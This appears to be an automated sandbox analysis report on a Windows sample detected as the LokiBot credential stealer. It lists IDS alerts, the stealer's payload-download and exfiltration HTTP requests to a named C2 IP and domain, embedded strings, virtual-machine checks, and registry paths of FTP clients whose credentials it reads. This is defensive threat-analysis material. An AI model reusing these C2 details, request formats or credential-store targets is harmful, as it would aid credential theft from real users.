Source: o6OaOfrAQs.exe
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Binary string: mshtml.pdb
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Binary string: mshtml.pdbUGP
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_0040626D FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_004026FE FindFirstFileA,
Source: Traffic
Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic
Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.11.20:49818 -> 185.246.220.85:80
Source: Traffic
Snort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.11.20:49818 -> 185.246.220.85:80
Source: global traffic
HTTP traffic detected:
    GET /jgEyxsZj50.ttf HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: ruhsalgelisim.com
    Cache-Control: no-cache
Source: global traffic
HTTP traffic detected:
    POST /habrik/five/fre.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.246.220.85
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 5EE3769A
    Content-Length: 178
    Connection: close
Source: unknown
TCP traffic detected without corresponding DNS query: 185.246.220.85
Source: unknown
UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: o6OaOfrAQs.exe
String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: o6OaOfrAQs.exe
String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://ocsp.digicert.com0C
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://ocsp.digicert.com0O
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002505000.00000004.00000020.00020000.00000000.sdmp
String found in binary or memory: http://ruhsalgelisim.com/jgEyxsZj50.ttf
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: http://www.digicert.com/CPS0
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
String found in binary or memory: http://www.gopher.ftp://ftp.
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000626000.00000020.00000001.01000000.00000006.sdmp
String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: o6OaOfrAQs.exe, 00000004.00000001.4722001821.0000000000649000.00000020.00000001.01000000.00000006.sdmp
String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000003.4849423147.0000000032400000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://login.live.com/
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://login.live.com//
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://login.live.com/https://login.live.com/
Source: o6OaOfrAQs.exe, 00000004.00000003.4849423147.000000003240A000.00000004.00001000.00020000.00000000.sdmp
String found in binary or memory: https://login.live.com/v104
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: https://www.digicert.com/CPS0
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.1.dr
String found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
Source: o6OaOfrAQs.exe, 00000001.00000003.4513469817.0000000002A06000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs o6OaOfrAQs.exe
Source: unknown
Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Process created: C:\Users\user\Desktop\o6OaOfrAQs.exe C:\Users\user\Desktop\o6OaOfrAQs.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5540 -s 204
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
Source: Yara match
File source: Process Memory Space: o6OaOfrAQs.exe PID: 6248, type: MEMORYSTR
Source: Yara match
File source: 00000001.00000002.4873071383.000000000358C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_6ED72F20 push eax; ret (at 1_2_6ED72F4E)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_03435F04 push es; ret (at 1_2_03435F06)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_034303E6 push 620F66DAh; iretd (at 1_2_034303EB)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_03430E2F push ds; ret (at 1_2_03430E38)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_0343208F push edx; retf (at 1_2_03432090)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 4_2_01665F04 push es; ret (at 4_2_01665F06)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 4_2_016603E6 push 620F66DAh; iretd (at 4_2_016603EB)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 4_2_01660E2F push ds; ret (at 4_2_01660E38)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 4_2_0166208F push edx; retf (at 4_2_01662090)
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_6ED71A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe
Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
API call chain: ExitProcess graph end node
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Guest Shutdown Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: vmicshutdown
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V PowerShell Direct Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Time Synchronization Service
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: vmicvss
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4895164716.00000000024E4000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAW
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Data Exchange Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Heartbeat Service
Source: o6OaOfrAQs.exe, 00000001.00000002.4886296451.00000000040C9000.00000004.00000800.00020000.00000000.sdmp, o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: Hyper-V Guest Service Interface
Source: o6OaOfrAQs.exe, 00000004.00000002.4896844145.0000000003EB9000.00000004.00000800.00020000.00000000.sdmp
Binary or memory string: vmicheartbeat
Source: o6OaOfrAQs.exe, 00000004.00000002.4895164716.0000000002521000.00000004.00000020.00020000.00000000.sdmp
Binary or memory string: Hyper-V RAW[A
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
Code function: 1_2_00402D63 GetTempPathA,GetTickCount,GetModuleFileNameA,GetFileSize,LdrInitializeThunk,GlobalAlloc,SetFilePointer,
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Users\user\Desktop\o6OaOfrAQs.exe
File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts